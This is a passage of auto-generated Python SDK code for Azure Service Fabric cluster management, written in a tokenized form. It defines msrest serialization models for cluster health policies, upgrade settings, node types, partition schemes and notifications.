least one unhealthy node, the health is evaluated as Warning. The percentage is calculated by dividing the number of unhealthy nodes over the total number of nodes in the cluster. The computation rounds up to tolerate one failure on small numbers of nodes. Default percentage is zero. In large clusters, some nodes will always be down or out for repairs, so this percentage should be configured to tolerate that. :type max_percent_unhealthy_nodes: int :param max_percent_unhealthy_applications: The maximum allowed percentage of unhealthy applications before reporting an error. For example, to allow 10% of applications to be unhealthy, this value would be 10. The percentage represents the maximum tolerated percentage of applications that can be unhealthy before the cluster is considered in error. If the percentage is respected but there is at least one unhealthy application, the health is evaluated as Warning. This is calculated by dividing the number of unhealthy applications over the total number of application instances in the cluster, excluding applications of application types that are included in the ApplicationTypeHealthPolicyMap. The computation rounds up to tolerate one failure on small numbers of applications. Default percentage is zero. :type max_percent_unhealthy_applications: int :param application_health_policies: Defines the application health policy map used to evaluate the health of an application or one of its children entities. :type application_health_policies: dict[str, ~azure.mgmt.servicefabric.models.ApplicationHealthPolicy] """<line_sep>_validation={'max_percent_unhealthy_nodes':{'maximum':100 'minimum':0} 'max_percent_unhealthy_applications':{'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_unhealthy_nodes':{'key':'maxPercentUnhealthyNodes' 'type':'int'} 'max_percent_unhealthy_applications':{'key':'maxPercentUnhealthyApplications' 'type':'int'} 'application_health_policies':{'key':'applicationHealthPolicies' 'type':'{ApplicationHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_unhealthy_nodes=kwargs.get('max_percent_unhealthy_nodes' 0)<line_sep>self.max_percent_unhealthy_applications=kwargs.get('max_percent_unhealthy_applications' 0)<line_sep>self.application_health_policies=kwargs.get('application_health_policies' <none>)<block_end><block_end><class_stmt>ClusterListResult(msrest.serialization.Model)<block_start>"""Cluster list results. :param value: :type value: list[~azure.mgmt.servicefabric.models.Cluster] :param next_link: The URL to use for getting the next set of results. :type next_link: str """<line_sep>_attribute_map={'value':{'key':'value' 'type':'[Cluster]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterListResult self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=kwargs.get('next_link' <none>)<block_end><block_end><class_stmt>ClusterUpdateParameters(msrest.serialization.Model)<block_start>"""Cluster update request. :param tags: A set of tags. Cluster update parameters. :type tags: dict[str, str] :param add_on_features: The list of add-on features to enable in the cluster. :type add_on_features: list[str or ~azure.mgmt.servicefabric.models.AddOnFeatures] :param certificate: The certificate to use for securing the cluster. The certificate provided will be used for node to node security within the cluster, SSL certificate for cluster management endpoint and default admin client. :type certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param certificate_common_names: Describes a list of server certificates referenced by common name that are used to secure the cluster. :type certificate_common_names: ~azure.mgmt.servicefabric.models.ServerCertificateCommonNames :param client_certificate_common_names: The list of client certificates referenced by common name that are allowed to manage the cluster. This will overwrite the existing list. :type client_certificate_common_names: list[~azure.mgmt.servicefabric.models.ClientCertificateCommonName] :param client_certificate_thumbprints: The list of client certificates referenced by thumbprint that are allowed to manage the cluster. This will overwrite the existing list. :type client_certificate_thumbprints: list[~azure.mgmt.servicefabric.models.ClientCertificateThumbprint] :param cluster_code_version: The Service Fabric runtime version of the cluster. This property can only by set the user when **upgradeMode** is set to 'Manual'. To get list of available Service Fabric versions for new clusters use `ClusterVersion API <./ClusterVersion.md>`_. To get the list of available version for existing clusters use **availableClusterVersions**. :type cluster_code_version: str :param event_store_service_enabled: Indicates if the event store service is enabled. :type event_store_service_enabled: bool :param fabric_settings: The list of custom fabric settings to configure the cluster. This will overwrite the existing list. :type fabric_settings: list[~azure.mgmt.servicefabric.models.SettingsSectionDescription] :param node_types: The list of node types in the cluster. This will overwrite the existing list. :type node_types: list[~azure.mgmt.servicefabric.models.NodeTypeDescription] :param reliability_level: The reliability level sets the replica set size of system services. Learn about `ReliabilityLevel <https://docs.microsoft.com/azure/service-fabric/service-fabric-cluster-capacity>`_. * None - Run the System services with a target replica set count of 1. This should only be used for test clusters. * Bronze - Run the System services with a target replica set count of 3. This should only be used for test clusters. * Silver - Run the System services with a target replica set count of 5. * Gold - Run the System services with a target replica set count of 7. * Platinum - Run the System services with a target replica set count of 9. Possible values include: "None", "Bronze", "Silver", "Gold", "Platinum". :type reliability_level: str or ~azure.mgmt.servicefabric.models.ReliabilityLevel :param reverse_proxy_certificate: The server certificate used by reverse proxy. :type reverse_proxy_certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param upgrade_description: The policy to use when upgrading the cluster. :type upgrade_description: ~azure.mgmt.servicefabric.models.ClusterUpgradePolicy :param application_type_versions_cleanup_policy: The policy used to clean up unused versions. :type application_type_versions_cleanup_policy: ~azure.mgmt.servicefabric.models.ApplicationTypeVersionsCleanupPolicy :param upgrade_mode: The upgrade mode of the cluster when new Service Fabric runtime version is available. Possible values include: "Automatic", "Manual". Default value: "Automatic". :type upgrade_mode: str or ~azure.mgmt.servicefabric.models.UpgradeMode :param sf_zonal_upgrade_mode: This property controls the logical grouping of VMs in upgrade domains (UDs). This property can't be modified if a node type with multiple Availability Zones is already present in the cluster. Possible values include: "Parallel", "Hierarchical". :type sf_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.SfZonalUpgradeMode :param vmss_zonal_upgrade_mode: This property defines the upgrade mode for the virtual machine scale set, it is mandatory if a node type with multiple Availability Zones is added. Possible values include: "Parallel", "Hierarchical". :type vmss_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.VmssZonalUpgradeMode :param infrastructure_service_manager: Indicates if infrastructure service manager is enabled. :type infrastructure_service_manager: bool :param upgrade_wave: Indicates when new cluster runtime version upgrades will be applied after they are released. By default is Wave0. Only applies when **upgradeMode** is set to 'Automatic'. Possible values include: "Wave0", "Wave1", "Wave2". :type upgrade_wave: str or ~azure.mgmt.servicefabric.models.ClusterUpgradeCadence :param upgrade_pause_start_timestamp_utc: The start timestamp to pause runtime version upgrades on the cluster (UTC). :type upgrade_pause_start_timestamp_utc: ~datetime.datetime :param upgrade_pause_end_timestamp_utc: The end timestamp of pause runtime version upgrades on the cluster (UTC). :type upgrade_pause_end_timestamp_utc: ~datetime.datetime :param wave_upgrade_paused: Boolean to pause automatic runtime version upgrades to the cluster. :type wave_upgrade_paused: bool :param notifications: Indicates a list of notification channels for cluster events. :type notifications: list[~azure.mgmt.servicefabric.models.Notification] """<line_sep>_attribute_map={'tags':{'key':'tags' 'type':'{str}'} 'add_on_features':{'key':'properties.addOnFeatures' 'type':'[str]'} 'certificate':{'key':'properties.certificate' 'type':'CertificateDescription'} 'certificate_common_names':{'key':'properties.certificateCommonNames' 'type':'ServerCertificateCommonNames'} 'client_certificate_common_names':{'key':'properties.clientCertificateCommonNames' 'type':'[ClientCertificateCommonName]'} 'client_certificate_thumbprints':{'key':'properties.clientCertificateThumbprints' 'type':'[ClientCertificateThumbprint]'} 'cluster_code_version':{'key':'properties.clusterCodeVersion' 'type':'str'} 'event_store_service_enabled':{'key':'properties.eventStoreServiceEnabled' 'type':'bool'} 'fabric_settings':{'key':'properties.fabricSettings' 'type':'[SettingsSectionDescription]'} 'node_types':{'key':'properties.nodeTypes' 'type':'[NodeTypeDescription]'} 'reliability_level':{'key':'properties.reliabilityLevel' 'type':'str'} 'reverse_proxy_certificate':{'key':'properties.reverseProxyCertificate' 'type':'CertificateDescription'} 'upgrade_description':{'key':'properties.upgradeDescription' 'type':'ClusterUpgradePolicy'} 'application_type_versions_cleanup_policy':{'key':'properties.applicationTypeVersionsCleanupPolicy' 'type':'ApplicationTypeVersionsCleanupPolicy'} 'upgrade_mode':{'key':'properties.upgradeMode' 'type':'str'} 'sf_zonal_upgrade_mode':{'key':'properties.sfZonalUpgradeMode' 'type':'str'} 'vmss_zonal_upgrade_mode':{'key':'properties.vmssZonalUpgradeMode' 'type':'str'} 'infrastructure_service_manager':{'key':'properties.infrastructureServiceManager' 'type':'bool'} 'upgrade_wave':{'key':'properties.upgradeWave' 'type':'str'} 'upgrade_pause_start_timestamp_utc':{'key':'properties.upgradePauseStartTimestampUtc' 'type':'iso-8601'} 'upgrade_pause_end_timestamp_utc':{'key':'properties.upgradePauseEndTimestampUtc' 'type':'iso-8601'} 'wave_upgrade_paused':{'key':'properties.waveUpgradePaused' 'type':'bool'} 'notifications':{'key':'properties.notifications' 'type':'[Notification]'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterUpdateParameters self).__init__(**kwargs)<line_sep>self.tags=kwargs.get('tags' <none>)<line_sep>self.add_on_features=kwargs.get('add_on_features' <none>)<line_sep>self.certificate=kwargs.get('certificate' <none>)<line_sep>self.certificate_common_names=kwargs.get('certificate_common_names' <none>)<line_sep>self.client_certificate_common_names=kwargs.get('client_certificate_common_names' <none>)<line_sep>self.client_certificate_thumbprints=kwargs.get('client_certificate_thumbprints' <none>)<line_sep>self.cluster_code_version=kwargs.get('cluster_code_version' <none>)<line_sep>self.event_store_service_enabled=kwargs.get('event_store_service_enabled' <none>)<line_sep>self.fabric_settings=kwargs.get('fabric_settings' <none>)<line_sep>self.node_types=kwargs.get('node_types' <none>)<line_sep>self.reliability_level=kwargs.get('reliability_level' <none>)<line_sep>self.reverse_proxy_certificate=kwargs.get('reverse_proxy_certificate' <none>)<line_sep>self.upgrade_description=kwargs.get('upgrade_description' <none>)<line_sep>self.application_type_versions_cleanup_policy=kwargs.get('application_type_versions_cleanup_policy' <none>)<line_sep>self.upgrade_mode=kwargs.get('upgrade_mode' "Automatic")<line_sep>self.sf_zonal_upgrade_mode=kwargs.get('sf_zonal_upgrade_mode' <none>)<line_sep>self.vmss_zonal_upgrade_mode=kwargs.get('vmss_zonal_upgrade_mode' <none>)<line_sep>self.infrastructure_service_manager=kwargs.get('infrastructure_service_manager' <none>)<line_sep>self.upgrade_wave=kwargs.get('upgrade_wave' <none>)<line_sep>self.upgrade_pause_start_timestamp_utc=kwargs.get('upgrade_pause_start_timestamp_utc' <none>)<line_sep>self.upgrade_pause_end_timestamp_utc=kwargs.get('upgrade_pause_end_timestamp_utc' <none>)<line_sep>self.wave_upgrade_paused=kwargs.get('wave_upgrade_paused' <none>)<line_sep>self.notifications=kwargs.get('notifications' <none>)<block_end><block_end><class_stmt>ClusterUpgradeDeltaHealthPolicy(msrest.serialization.Model)<block_start>"""Describes the delta health policies for the cluster upgrade. All required parameters must be populated in order to send to Azure. :param max_percent_delta_unhealthy_nodes: Required. The maximum allowed percentage of nodes health degradation allowed during cluster upgrades. The delta is measured between the state of the nodes at the beginning of upgrade and the state of the nodes at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits. :type max_percent_delta_unhealthy_nodes: int :param max_percent_upgrade_domain_delta_unhealthy_nodes: Required. The maximum allowed percentage of upgrade domain nodes health degradation allowed during cluster upgrades. The delta is measured between the state of the upgrade domain nodes at the beginning of upgrade and the state of the upgrade domain nodes at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion for all completed upgrade domains to make sure the state of the upgrade domains is within tolerated limits. :type max_percent_upgrade_domain_delta_unhealthy_nodes: int :param max_percent_delta_unhealthy_applications: Required. The maximum allowed percentage of applications health degradation allowed during cluster upgrades. The delta is measured between the state of the applications at the beginning of upgrade and the state of the applications at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits. System services are not included in this. :type max_percent_delta_unhealthy_applications: int :param application_delta_health_policies: Defines the application delta health policy map used to evaluate the health of an application or one of its child entities when upgrading the cluster. :type application_delta_health_policies: dict[str, ~azure.mgmt.servicefabric.models.ApplicationDeltaHealthPolicy] """<line_sep>_validation={'max_percent_delta_unhealthy_nodes':{'required':<true> 'maximum':100 'minimum':0} 'max_percent_upgrade_domain_delta_unhealthy_nodes':{'required':<true> 'maximum':100 'minimum':0} 'max_percent_delta_unhealthy_applications':{'required':<true> 'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_delta_unhealthy_nodes':{'key':'maxPercentDeltaUnhealthyNodes' 'type':'int'} 'max_percent_upgrade_domain_delta_unhealthy_nodes':{'key':'maxPercentUpgradeDomainDeltaUnhealthyNodes' 'type':'int'} 'max_percent_delta_unhealthy_applications':{'key':'maxPercentDeltaUnhealthyApplications' 'type':'int'} 'application_delta_health_policies':{'key':'applicationDeltaHealthPolicies' 'type':'{ApplicationDeltaHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterUpgradeDeltaHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_delta_unhealthy_nodes=kwargs['max_percent_delta_unhealthy_nodes']<line_sep>self.max_percent_upgrade_domain_delta_unhealthy_nodes=kwargs['max_percent_upgrade_domain_delta_unhealthy_nodes']<line_sep>self.max_percent_delta_unhealthy_applications=kwargs['max_percent_delta_unhealthy_applications']<line_sep>self.application_delta_health_policies=kwargs.get('application_delta_health_policies' <none>)<block_end><block_end><class_stmt>ClusterUpgradePolicy(msrest.serialization.Model)<block_start>"""Describes the policy used when upgrading the cluster. All required parameters must be populated in order to send to Azure. :param force_restart: If true, then processes are forcefully restarted during upgrade even when the code version has not changed (the upgrade only changes configuration or data). :type force_restart: bool :param upgrade_replica_set_check_timeout: Required. The maximum amount of time to block processing of an upgrade domain and prevent loss of availability when there are unexpected issues. When this timeout expires, processing of the upgrade domain will proceed regardless of availability loss issues. The timeout is reset at the start of each upgrade domain. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type upgrade_replica_set_check_timeout: str :param health_check_wait_duration: Required. The length of time to wait after completing an upgrade domain before performing health checks. The duration can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type health_check_wait_duration: str :param health_check_stable_duration: Required. The amount of time that the application or cluster must remain healthy before the upgrade proceeds to the next upgrade domain. The duration can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type health_check_stable_duration: str :param health_check_retry_timeout: Required. The amount of time to retry health evaluation when the application or cluster is unhealthy before the upgrade rolls back. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type health_check_retry_timeout: str :param upgrade_timeout: Required. The amount of time the overall upgrade has to complete before the upgrade rolls back. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type upgrade_timeout: str :param upgrade_domain_timeout: Required. The amount of time each upgrade domain has to complete before the upgrade rolls back. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type upgrade_domain_timeout: str :param health_policy: Required. The cluster health policy used when upgrading the cluster. :type health_policy: ~azure.mgmt.servicefabric.models.ClusterHealthPolicy :param delta_health_policy: The cluster delta health policy used when upgrading the cluster. :type delta_health_policy: ~azure.mgmt.servicefabric.models.ClusterUpgradeDeltaHealthPolicy """<line_sep>_validation={'upgrade_replica_set_check_timeout':{'required':<true>} 'health_check_wait_duration':{'required':<true>} 'health_check_stable_duration':{'required':<true>} 'health_check_retry_timeout':{'required':<true>} 'upgrade_timeout':{'required':<true>} 'upgrade_domain_timeout':{'required':<true>} 'health_policy':{'required':<true>} }<line_sep>_attribute_map={'force_restart':{'key':'forceRestart' 'type':'bool'} 'upgrade_replica_set_check_timeout':{'key':'upgradeReplicaSetCheckTimeout' 'type':'str'} 'health_check_wait_duration':{'key':'healthCheckWaitDuration' 'type':'str'} 'health_check_stable_duration':{'key':'healthCheckStableDuration' 'type':'str'} 'health_check_retry_timeout':{'key':'healthCheckRetryTimeout' 'type':'str'} 'upgrade_timeout':{'key':'upgradeTimeout' 'type':'str'} 'upgrade_domain_timeout':{'key':'upgradeDomainTimeout' 'type':'str'} 'health_policy':{'key':'healthPolicy' 'type':'ClusterHealthPolicy'} 'delta_health_policy':{'key':'deltaHealthPolicy' 'type':'ClusterUpgradeDeltaHealthPolicy'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterUpgradePolicy self).__init__(**kwargs)<line_sep>self.force_restart=kwargs.get('force_restart' <none>)<line_sep>self.upgrade_replica_set_check_timeout=kwargs['upgrade_replica_set_check_timeout']<line_sep>self.health_check_wait_duration=kwargs['health_check_wait_duration']<line_sep>self.health_check_stable_duration=kwargs['health_check_stable_duration']<line_sep>self.health_check_retry_timeout=kwargs['health_check_retry_timeout']<line_sep>self.upgrade_timeout=kwargs['upgrade_timeout']<line_sep>self.upgrade_domain_timeout=kwargs['upgrade_domain_timeout']<line_sep>self.health_policy=kwargs['health_policy']<line_sep>self.delta_health_policy=kwargs.get('delta_health_policy' <none>)<block_end><block_end><class_stmt>ClusterVersionDetails(msrest.serialization.Model)<block_start>"""The detail of the Service Fabric runtime version result. :param code_version: The Service Fabric runtime version of the cluster. :type code_version: str :param support_expiry_utc: The date of expiry of support of the version. :type support_expiry_utc: str :param environment: Indicates if this version is for Windows or Linux operating system. Possible values include: "Windows", "Linux". :type environment: str or ~azure.mgmt.servicefabric.models.ClusterEnvironment """<line_sep>_attribute_map={'code_version':{'key':'codeVersion' 'type':'str'} 'support_expiry_utc':{'key':'supportExpiryUtc' 'type':'str'} 'environment':{'key':'environment' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterVersionDetails self).__init__(**kwargs)<line_sep>self.code_version=kwargs.get('code_version' <none>)<line_sep>self.support_expiry_utc=kwargs.get('support_expiry_utc' <none>)<line_sep>self.environment=kwargs.get('environment' <none>)<block_end><block_end><class_stmt>DiagnosticsStorageAccountConfig(msrest.serialization.Model)<block_start>"""The storage account information for storing Service Fabric diagnostic logs. All required parameters must be populated in order to send to Azure. :param storage_account_name: Required. The Azure storage account name. :type storage_account_name: str :param protected_account_key_name: Required. The protected diagnostics storage key name. :type protected_account_key_name: str :param protected_account_key_name2: The secondary protected diagnostics storage key name. If one of the storage account keys is rotated the cluster will fallback to using the other. :type protected_account_key_name2: str :param blob_endpoint: Required. The blob endpoint of the azure storage account. :type blob_endpoint: str :param queue_endpoint: Required. The queue endpoint of the azure storage account. :type queue_endpoint: str :param table_endpoint: Required. The table endpoint of the azure storage account. :type table_endpoint: str """<line_sep>_validation={'storage_account_name':{'required':<true>} 'protected_account_key_name':{'required':<true>} 'blob_endpoint':{'required':<true>} 'queue_endpoint':{'required':<true>} 'table_endpoint':{'required':<true>} }<line_sep>_attribute_map={'storage_account_name':{'key':'storageAccountName' 'type':'str'} 'protected_account_key_name':{'key':'protectedAccountKeyName' 'type':'str'} 'protected_account_key_name2':{'key':'protectedAccountKeyName2' 'type':'str'} 'blob_endpoint':{'key':'blobEndpoint' 'type':'str'} 'queue_endpoint':{'key':'queueEndpoint' 'type':'str'} 'table_endpoint':{'key':'tableEndpoint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(DiagnosticsStorageAccountConfig self).__init__(**kwargs)<line_sep>self.storage_account_name=kwargs['storage_account_name']<line_sep>self.protected_account_key_name=kwargs['protected_account_key_name']<line_sep>self.protected_account_key_name2=kwargs.get('protected_account_key_name2' <none>)<line_sep>self.blob_endpoint=kwargs['blob_endpoint']<line_sep>self.queue_endpoint=kwargs['queue_endpoint']<line_sep>self.table_endpoint=kwargs['table_endpoint']<block_end><block_end><class_stmt>EndpointRangeDescription(msrest.serialization.Model)<block_start>"""Port range details. All required parameters must be populated in order to send to Azure. :param start_port: Required. Starting port of a range of ports. :type start_port: int :param end_port: Required. End port of a range of ports. :type end_port: int """<line_sep>_validation={'start_port':{'required':<true>} 'end_port':{'required':<true>} }<line_sep>_attribute_map={'start_port':{'key':'startPort' 'type':'int'} 'end_port':{'key':'endPort' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(EndpointRangeDescription self).__init__(**kwargs)<line_sep>self.start_port=kwargs['start_port']<line_sep>self.end_port=kwargs['end_port']<block_end><block_end><class_stmt>ErrorModel(msrest.serialization.Model)<block_start>"""The structure of the error. :param error: The error details. :type error: ~azure.mgmt.servicefabric.models.ErrorModelError """<line_sep>_attribute_map={'error':{'key':'error' 'type':'ErrorModelError'} }<def_stmt>__init__ self **kwargs<block_start>super(ErrorModel self).__init__(**kwargs)<line_sep>self.error=kwargs.get('error' <none>)<block_end><block_end><class_stmt>ErrorModelError(msrest.serialization.Model)<block_start>"""The error details. :param code: The error code. :type code: str :param message: The error message. :type message: str """<line_sep>_attribute_map={'code':{'key':'code' 'type':'str'} 'message':{'key':'message' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ErrorModelError self).__init__(**kwargs)<line_sep>self.code=kwargs.get('code' <none>)<line_sep>self.message=kwargs.get('message' <none>)<block_end><block_end><class_stmt>ManagedIdentity(msrest.serialization.Model)<block_start>"""Describes the managed identities for an Azure resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar principal_id: The principal id of the managed identity. This property will only be provided for a system assigned identity. :vartype principal_id: str :ivar tenant_id: The tenant id of the managed identity. This property will only be provided for a system assigned identity. :vartype tenant_id: str :param type: The type of managed identity for the resource. Possible values include: "SystemAssigned", "UserAssigned", "SystemAssigned, UserAssigned", "None". :type type: str or ~azure.mgmt.servicefabric.models.ManagedIdentityType :param user_assigned_identities: The list of user identities associated with the resource. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'. :type user_assigned_identities: dict[str, ~azure.mgmt.servicefabric.models.UserAssignedIdentity] """<line_sep>_validation={'principal_id':{'readonly':<true>} 'tenant_id':{'readonly':<true>} }<line_sep>_attribute_map={'principal_id':{'key':'principalId' 'type':'str'} 'tenant_id':{'key':'tenantId' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'user_assigned_identities':{'key':'userAssignedIdentities' 'type':'{UserAssignedIdentity}'} }<def_stmt>__init__ self **kwargs<block_start>super(ManagedIdentity self).__init__(**kwargs)<line_sep>self.principal_id=<none><line_sep>self.tenant_id=<none><line_sep>self.type=kwargs.get('type' <none>)<line_sep>self.user_assigned_identities=kwargs.get('user_assigned_identities' <none>)<block_end><block_end><class_stmt>PartitionSchemeDescription(msrest.serialization.Model)<block_start>"""Describes how the service is partitioned. You probably want to use the sub-classes and not this class directly. Known sub-classes are: NamedPartitionSchemeDescription, SingletonPartitionSchemeDescription, UniformInt64RangePartitionSchemeDescription. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme """<line_sep>_validation={'partition_scheme':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} }<line_sep>_subtype_map={'partition_scheme':{'Named':'NamedPartitionSchemeDescription' 'Singleton':'SingletonPartitionSchemeDescription' 'UniformInt64Range':'UniformInt64RangePartitionSchemeDescription'}}<def_stmt>__init__ self **kwargs<block_start>super(PartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme=<none><block_end><block_end># type: Optional[str] <class_stmt>NamedPartitionSchemeDescription(PartitionSchemeDescription)<block_start>"""Describes the named partition scheme of the service. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme :param count: Required. The number of partitions. :type count: int :param names: Required. Array of size specified by the ‘count’ parameter, for the names of the partitions. :type names: list[str] """<line_sep>_validation={'partition_scheme':{'required':<true>} 'count':{'required':<true>} 'names':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} 'count':{'key':'count' 'type':'int'} 'names':{'key':'names' 'type':'[str]'} }<def_stmt>__init__ self **kwargs<block_start>super(NamedPartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme='Named'# type: str self.count=kwargs['count']<line_sep>self.names=kwargs['names']<block_end><block_end><class_stmt>NodeTypeDescription(msrest.serialization.Model)<block_start>"""Describes a node type in the cluster, each node type represents sub set of nodes in the cluster. All required parameters must be populated in order to send to Azure. :param name: Required. The name of the node type. :type name: str :param placement_properties: The placement tags applied to nodes in the node type, which can be used to indicate where certain services (workload) should run. :type placement_properties: dict[str, str] :param capacities: The capacity tags applied to the nodes in the node type, the cluster resource manager uses these tags to understand how much resource a node has. :type capacities: dict[str, str] :param client_connection_endpoint_port: Required. The TCP cluster management endpoint port. :type client_connection_endpoint_port: int :param http_gateway_endpoint_port: Required. The HTTP cluster management endpoint port. :type http_gateway_endpoint_port: int :param durability_level: The durability level of the node type. Learn about `DurabilityLevel <https://docs.microsoft.com/azure/service-fabric/service-fabric-cluster-capacity>`_. * Bronze - No privileges. This is the default. * Silver - The infrastructure jobs can be paused for a duration of 10 minutes per UD. * Gold - The infrastructure jobs can be paused for a duration of 2 hours per UD. Gold durability can be enabled only on full node VM skus like D15_V2, G5 etc. Possible values include: "Bronze", "Silver", "Gold". :type durability_level: str or ~azure.mgmt.servicefabric.models.DurabilityLevel :param application_ports: The range of ports from which cluster assigned port to Service Fabric applications. :type application_ports: ~azure.mgmt.servicefabric.models.EndpointRangeDescription :param ephemeral_ports: The range of ephemeral ports that nodes in this node type should be configured with. :type ephemeral_ports: ~azure.mgmt.servicefabric.models.EndpointRangeDescription :param is_primary: Required. The node type on which system services will run. Only one node type should be marked as primary. Primary node type cannot be deleted or changed for existing clusters. :type is_primary: bool :param vm_instance_count: Required. VMInstanceCount should be 1 to n, where n indicates the number of VM instances corresponding to this nodeType. VMInstanceCount = 0 can be done only in these scenarios: NodeType is a secondary nodeType. Durability = Bronze or Durability >= Bronze and InfrastructureServiceManager = true. If VMInstanceCount = 0, implies the VMs for this nodeType will not be used for the initial cluster size computation. :type vm_instance_count: int :param reverse_proxy_endpoint_port: The endpoint used by reverse proxy. :type reverse_proxy_endpoint_port: int :param is_stateless: Indicates if the node type can only host Stateless workloads. :type is_stateless: bool :param multiple_availability_zones: Indicates if the node type is enabled to support multiple zones. :type multiple_availability_zones: bool """<line_sep>_validation={'name':{'required':<true>} 'client_connection_endpoint_port':{'required':<true>} 'http_gateway_endpoint_port':{'required':<true>} 'is_primary':{'required':<true>} 'vm_instance_count':{'required':<true> 'maximum':2147483647 'minimum':0} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'placement_properties':{'key':'placementProperties' 'type':'{str}'} 'capacities':{'key':'capacities' 'type':'{str}'} 'client_connection_endpoint_port':{'key':'clientConnectionEndpointPort' 'type':'int'} 'http_gateway_endpoint_port':{'key':'httpGatewayEndpointPort' 'type':'int'} 'durability_level':{'key':'durabilityLevel' 'type':'str'} 'application_ports':{'key':'applicationPorts' 'type':'EndpointRangeDescription'} 'ephemeral_ports':{'key':'ephemeralPorts' 'type':'EndpointRangeDescription'} 'is_primary':{'key':'isPrimary' 'type':'bool'} 'vm_instance_count':{'key':'vmInstanceCount' 'type':'int'} 'reverse_proxy_endpoint_port':{'key':'reverseProxyEndpointPort' 'type':'int'} 'is_stateless':{'key':'isStateless' 'type':'bool'} 'multiple_availability_zones':{'key':'multipleAvailabilityZones' 'type':'bool'} }<def_stmt>__init__ self **kwargs<block_start>super(NodeTypeDescription self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.placement_properties=kwargs.get('placement_properties' <none>)<line_sep>self.capacities=kwargs.get('capacities' <none>)<line_sep>self.client_connection_endpoint_port=kwargs['client_connection_endpoint_port']<line_sep>self.http_gateway_endpoint_port=kwargs['http_gateway_endpoint_port']<line_sep>self.durability_level=kwargs.get('durability_level' <none>)<line_sep>self.application_ports=kwargs.get('application_ports' <none>)<line_sep>self.ephemeral_ports=kwargs.get('ephemeral_ports' <none>)<line_sep>self.is_primary=kwargs['is_primary']<line_sep>self.vm_instance_count=kwargs['vm_instance_count']<line_sep>self.reverse_proxy_endpoint_port=kwargs.get('reverse_proxy_endpoint_port' <none>)<line_sep>self.is_stateless=kwargs.get('is_stateless' <none>)<line_sep>self.multiple_availability_zones=kwargs.get('multiple_availability_zones' <none>)<block_end><block_end><class_stmt>Notification(msrest.serialization.Model)<block_start>"""Describes the notification channel for cluster events. All required parameters must be populated in order to send to Azure. :param is_enabled: Required. Indicates if the notification is enabled. :type is_enabled: bool :param notification_category: Required. The category of notification. Possible values include: "WaveProgress". :type notification_category: str or ~azure.mgmt.servicefabric.models.NotificationCategory :param notification_level: Required. The level of notification. Possible values include: "Critical", "All". :type notification_level: str or ~azure.mgmt.servicefabric.models.NotificationLevel :param notification_targets: Required. List of targets that subscribe to the notification. :type notification_targets: list[~azure.mgmt.servicefabric.models.NotificationTarget] """<line_sep>_validation={'is_enabled':{'required':<true>} 'notification_category':{'required':<true>} 'notification_level':{'required':<true>} 'notification_targets':{'required':<true>} }<line_sep>_attribute_map={'is_enabled':{'key':'isEnabled' 'type':'bool'} 'notification_category':{'key':'notificationCategory' 'type':'str'} 'notification_level':{'key':'notificationLevel' 'type':'str'} 'notification_targets':{'key':'notificationTargets' 'type':'[NotificationTarget]'} }<def_stmt>__init__ self **kwargs<block_start>super(Notification self).__init__(**kwargs)<line_sep>self.is_enabled=kwargs['is_enabled']<line_sep>self.notification_category=kwargs['notification_category']<line_sep>self.notification_level=kwargs['notification_level']<line_sep>self.notification_targets=kwargs['notification_targets']<block_end><block_end><class_stmt>NotificationTarget(msrest.serialization.Model)<block_start>"""Describes the notification target properties. All required parameters must be populated in order to send to Azure. :param notification_channel: Required. The notification channel indicates the type of receivers subscribed to the notification, either user or subscription. Possible values include: "EmailUser", "EmailSubscription". :type notification_channel: str or ~azure.mgmt.servicefabric.models.NotificationChannel :param receivers: Required. List of targets that subscribe to the notification. :type receivers: list[str] """<line_sep>_validation={'notification_channel':{'required':<true>} 'receivers':{'required':<true>} 